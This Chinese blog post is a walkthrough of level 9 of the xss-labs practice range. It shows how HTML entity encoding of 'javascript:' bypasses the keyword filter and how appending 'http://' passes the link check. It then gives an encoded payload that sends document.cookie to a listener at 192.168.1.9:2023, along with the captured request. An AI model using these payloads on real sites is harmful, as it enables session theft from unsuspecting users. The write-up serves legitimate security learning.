[网络安全]xss-labs level-9 解题详析

已于 2024-07-30 18:12:03 修改
阅读量2.5k 收藏 1
点赞数 1
分类专栏: # Xss-Labs靶场攻防实战 文章标签: web安全 xss xsslabs
于 2023-08-04 08:06:41 首次发布
该原创文章未经本人许可,不得用于商业用途。未经授权不得转载,否则保留追究法律责任的权利。
本文链接:https://blog.csdn.net/2301_77485708/article/details/132087722
版权

读者可参考、订阅专栏:Xss-Labs靶场攻防实战

姿势

逻辑后端代码:

在这里插入图片描述

该题与 level-9 的区别是,加上了对地址的判断

故我们可对初始POC使用html实体编码处理,使关键字不被过滤;再添加http://

我们看看初始POC该如何构造:

在这里插入图片描述

也就是说我们填入的内容存在于<a href=内容></a>

而将 JavaScript 代码放在 href 属性中,当用户点击具有此链接的元素时,浏览器会执行其中的 JavaScript 代码。

所以初始POC可构造为:

javascript:alert("http://")

编码后得到

java&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert(&quot;http://&quot;)

在这里插入图片描述

如何利用,使得危害扩大?

可以进行数据外带操作,原理及姿势参考链接:[网络安全]XSS之Cookie外带攻击姿势

脚本如下:

在这里插入图片描述
构造POC如下:

javascript:document.write('<img src="http://192.168.1.9:2023/'+document.cookie+'"/>')

将关键字进行html实体编码后得到:

java&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:document.write(&#x27;&#x3c;img&#x20;&#x73;&#x72;&#x63;=&#x22;http://192.168.1.9:2023/&#x27;&#x2b;document&#x2e;cookie&#x2b;&#x27;&#x22;/&#x3e;&#x27;)

在这里插入图片描述

点击 友情链接 后监听到数据:

在这里插入图片描述在这里插入图片描述

Host: 192.168.1.9:2023

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0

Accept: image/avif,image/webp,*/*

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Referer: http://localhost/

Connection: keep-alive

burp编码工具模块的利用

Burp Suite 中涉及到编码和解码的模块是 “Encoder”(编码器)。

Burp Suite 的 “Encoder” 模块允许用户对数据进行各种编码和解码操作,以进行安全测试、漏洞利用或其他目的。该模块可以帮助用户执行如下任务:

  1. URL 编码/解码:对 URL 中的特殊字符进行编码或解码,包括保留字符和非 ASCII 字符。
  2. HTML 编码/解码:对 HTML 文档中的特殊字符(如 <, >, ", ')进行编码或解码,以防止跨站点脚本(XSS)等攻击。
  3. Base64 编码/解码:执行 Base64 编码和解码操作,用于在数据传输或存储中表示二进制数据。
  4. Unicode 编码/解码:将字符串转换为 Unicode 编码,或将 Unicode 编码还原为原始字符串。
  5. GZIP 压缩/解压缩:对数据执行 GZIP 压缩或解压缩操作,用于发送或接收压缩的数据。

在这里插入图片描述

秋说
关注
专栏目录
xssgame第九至第十
学习
10-08 2128
第九 这一,我发现无论我输入什么,都是不合法链接 另外,"和>都被过滤了 两项对比 只是少了一个http,就显示不合法链接,问题就出在 http:// 这个身上 所以我们要在输入的语句中添加http:// 比如javascript:alert('1')//http:// ...
xsslabs第九
weixin_63750160的博客
03-04 409
显示我的链接并不合法。
XSS LABS - Level 9 过思路
最新发布
Blue17 の 小窝
08-25 430
可以发现,又被过滤了。找到规则漏洞了,后端检测的是字符串中只要包含。进入卡,右击页面,查看源码,搜索键词。往合法的链接中添加不合法内容,尝试闭合。
XSS-labs-level9
m0_49025459的博客
06-09 108
感觉和 XSS-labs-level8差不多,但是加了”http://“校验。我们修改一下payload试一下。发现不太行,直接跳转到一个空白页了,应该是把语句当成网址跳转了,我们直接将http://放在最后,并且将它注释掉。发现可能存在过滤,然后可能还有链接校验操作,不解释我们直接去看看源代码。发现不好用,我们还是去网页源代码看一下。我们还是经典语句起手。
XXS level9
weixin_33887443的博客
03-24 275
(1)查看PHP源代码 <?php ini_set("display_errors", 0); $str = strtolower($_GET["keyword"]); $str2=str_replace("script","scr_ipt",$str); $str3=str_replace("on","o_n",$str2); $str4=str_replace("src...
xss-labs之level9、level10
weixin_51520483的博客
05-28 313
它接受两个参数:要搜索的字符串(主字符串)和要查找的子串。如果找到子串,则函数返回子串在主字符串中首次出现的位置(从 0 开始计数);,但是并没有过滤HTML实体编码,所以我们还是使用编码绕过,但是传入的参数需要有‘http://’,所以在payload后面加上,并注释。发现有隐藏传参数t_link、t_history、t_sort,但input属性是hidden,所以需要修改为text属性。尝试了之前的payload,发现都不行,看源码发现多了个。发现并没有输入框,跳转链接,查看页面源码。
xss-labs-master;1-9;内含靶场;更好了解xss
xiaochenhang的博客
08-22 522
alert(1)
xss-labs-master.zip(xss注入通游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
xss-labs-master.rar
05-09
XSS实验室详解:从入门到精通》 XSS(Cross-site scripting)是一种常见的Web应用程序安全漏洞,...通过系统地完成这二十个卡,你将能够更好地理解XSS的威胁,提高网络安全意识,为保护Web应用安全打下坚实基础。
xss-labs-master源码
07-06
XSS(Cross Site Scripting)是一种常见的网络安全漏洞,它允许攻击者在用户的浏览器上执行恶意脚本,进而盗取用户数据或控制用户的行为。"xss-labs-master"是一个专门设计的靶场,包含了20个级别的XSS练习,旨在...
xss-labs通详解 Level 6-10
qq_41755084的博客
10-25 1026
这一整体上与第五类似,只是黑名单的量增加了,尝试了href、src等字段,都被替换掉了。不过这个黑名单是大小写敏感的,而在html语句中,大小写不敏感。我们可以使用大小写字段进行绕过。构造注入代码从keyword参数处传入。将href的f大写,变为hreF,绕过黑名单,页面上成功插入了标签。点击该标签,成功弹窗。
xss-labs 通教程
SkyWT 的博客
07-05 2007
XSS 攻击历久弥新,目前 XSS 漏洞依然广泛存在。其核心在于找到注入点并通过 payload 让浏览器执行 js 代码。注入点不仅可以来源于用户提供的文本(请求参数或后端存储的字段),也可以是 Referer、UA、Cookie 等。通过<script>标签。通过元素的 onmouseover 属性。通过<img>的 onerror 属性,如。通过 URI,如。一般来说,使用 PHP 的函数能够防御很大一部分 XSS(注意过滤单引号)。许多字符过滤上的漏洞都是没有使用。
XSS-labs靶场实战(四)——第9-11
永远是少年
11-18 652
今天继续给大家介绍渗透测试相知识,本文主要内容是XSS-labs靶场实战第9-11。 一、第九 二、第十 三、第十一
xsslabs通
qq_61774705的博客
07-15 871
两个地方都用了htmlspecialchars($str),它的作用是将特殊符号转换成HTML实体,就是HTML为了防止特殊符号,如"
XSS-9注入靶场闯(小游戏)——第九
qq_39330735的博客
02-04 629
XSS-9注入靶场闯(小游戏)——第九,绕过后台字符串过滤,找出过滤条件,夹带过滤条件进行Payload
xss漏洞1-9
G208_522的博客
11-20 3152
第一 没有可以输入的表单,直接在url中拼接 <script>alert('xss')</script> 源码展示 <!DOCTYPE html><!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <script> window.alert = function()
xss-labs靶场训练(5-9
ldzhhh的博客
05-21 598
第一 先试一下经典的payload: 这里把script过滤了 onclick也被过滤了 onmouseover也同样被过滤了,尝试用标签执行javascript:伪协议。 Payload: ”><a href=javascript:alert()>xss</a>` 点击一下搜索按钮左侧的xss就成功弹窗了 后台键代码: <?php ini_set("display_errors", 0); $str = strtolower($_GET["keywor
XSS-Game level 9
热门推荐
wangyuxiang946的博客
07-08 1万+
xssgame9,XSS-Game第九过滤的很严 , 使用编码绕过
XSS-Labs靶场20全攻略:无限制payload实战
XSS-Labs是一个针对Web安全,特别是跨站脚本攻击(Cross-Site Scripting, XSS)的学习平台,它提供了一系列挑战性的实战练习,帮助学习者理解并掌握防御XSS攻击的方法。这个靶场位于GitHub上的do0dl3/xss-labs项目...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏,祝你平安喜乐。

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值